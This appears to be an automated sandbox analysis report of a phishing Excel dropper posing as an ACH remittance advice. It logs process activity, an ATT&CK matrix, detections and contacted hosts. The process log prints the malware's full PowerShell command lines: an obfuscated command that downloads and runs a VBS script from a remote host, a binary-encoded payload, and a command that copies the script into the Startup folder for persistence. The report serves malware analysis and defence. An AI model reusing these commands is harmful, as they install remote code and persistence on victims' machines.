Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: powershell.exe, 0000000F.00000002.965035928.000000000040A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,011001
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,011001Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\qwe.vbs" Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,011001Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\user\AppData\Local\Temp\qwe.vbs' -Destination 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qwe.vbs'Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\qwe.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts11
Command and Scripting Interpreter		Path Interception11
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts321
Scripting		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Modify Registry		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
Ingress Tool Transfer		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts1
Exploitation for Client Execution		Logon Script (Windows)Logon Script (Windows)21
Virtualization/Sandbox Evasion		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Non-Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local Accounts2
PowerShell		Logon Script (Mac)Logon Script (Mac)11
Process Injection		NTDS1
Remote System Discovery		Distributed Component Object ModelInput CaptureScheduled Transfer3
Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script321
Scripting		LSA Secrets2
File and Directory Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials13
System Information Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 690542 Sample: ACH Remittance Advice_CITI2... Startdate: 26/08/2022 Architecture: WINDOWS Score: 80 45 google.com 2->45 57 Antivirus detection for URL or domain 2->57 59 Multi AV Scanner detection for submitted file 2->59 61 Document contains an embedded macro with GUI obfuscation 2->61 63 Document exploit detected (process start blacklist hit) 2->63 10 EXCEL.EXE 45 32 2->10         started        13 iexplore.exe 1 33 2->13         started        15 wscript.exe 2->15         started        signatures3 process4 file5 41 C:\...\ACH Remittance Advice_CITI25822.xls, Composite 10->41 dropped 17 wscript.exe 1 10->17         started        20 wscript.exe 10->20         started        22 iexplore.exe 17 13->22         started        process6 dnsIp7 51 Suspicious powershell command line found 17->51 53 Wscript starts Powershell (via cmd or directly) 17->53 55 Very long command line found 17->55 25 powershell.exe 12 7 17->25         started        29 powershell.exe 20->29         started        47 209.127.20.13, 49172, 49173, 49174 SERVER-MANIACA Canada 22->47 signatures8 process9 dnsIp10 49 kopadd.yunethosting.rs 194.247.196.66, 443, 49171, 49175 YUNET-ASRS Serbia 25->49 43 C:\Users\user\AppData\Local\Temp\qwe.vbs, ASCII 25->43 dropped 31 wscript.exe 1 25->31         started        34 wscript.exe 29->34         started        file11 process12 signatures13 67 Wscript starts Powershell (via cmd or directly) 31->67 69 Very long command line found 31->69 36 powershell.exe 7 31->36         started        39 powershell.exe 7 31->39         started        process14 signatures15 65 Drops VBS files to the startup folder 36->65

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
ACH Remittance Advice_CITI25822.xls13%VirustotalBrowse
ACH Remittance Advice_CITI25822.xls10%ReversingLabsDocument-Excel.Dropper.SDrop

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
https://kopadd.yunethosting.rs/sync/gith.vbsPEH0%Avira URL Cloudsafe
https://kopadd.yunethosting.rs/sync/gith.vbs3%VirustotalBrowse
https://kopadd.yunethosting.rs/sync/gith.vbs0%Avira URL Cloudsafe
https://kopadd.yunethos(OE0%Avira URL Cloudsafe
http://www.piriform.co0%VirustotalBrowse
http://www.piriform.co0%Avira URL Cloudsafe
https://kopadd.y0%Avira URL Cloudsafe
https://kopadd.yunethosting.rs0%Avira URL Cloudsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
https://kopadd.yunethosting.rs/s0%Avira URL Cloudsafe
http://209.127.20.13/firm.txt100%Avira URL Cloudmalware
http://209.127.20.13/remit.jpg100%Avira URL Cloudmalware
http://ocsp.entrust.net0D0%URL Reputationsafe
http://209.127.20.13/favicon.ico100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
google.com
142.250.184.78
truefalse
    		high
    kopadd.yunethosting.rs
    		194.247.196.66
    		truefalse
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://kopadd.yunethosting.rs/sync/gith.vbsfalse
      • 3%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      http://209.127.20.13/firm.txttrue
      • Avira URL Cloud: malware
      		unknown
      http://209.127.20.13/remit.jpgtrue
      • Avira URL Cloud: malware
      		unknown
      http://209.127.20.13/favicon.icotrue
      • Avira URL Cloud: malware
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922327367.0000000002B9D000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000003.00000002.921752019.0000000000409000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.921723586.00000000003EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.943095970.000000000042E000.00000004.00000020.00020000.00000000.sdmpfalse
        		high
        http://crl.entrust.net/server1.crl0powershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922322263.0000000002B98000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922343704.0000000002BB8000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          http://ocsp.entrust.net03powershell.exe, 00000003.00000002.922336049.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922322263.0000000002B98000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.922343704.0000000002BB8000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://kopadd.yunethosting.rs/sync/gith.vbsPEHpowershell.exe, 00000003.00000002.925896669.0000000003635000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://kopadd.yunethos(OEpowershell.exe, 00000003.00000002.925896669.0000000003635000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		low
          http://www.piriform.copowershell.exe, 0000000C.00000002.945807312.00000000003DE000.00000004.00000020.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://kopadd.ypowershell.exe, 00000003.00000002.925896669.0000000003635000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://kopadd.yunethosting.rspowershell.exe, 00000003.00000002.926844350.0000000003816000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
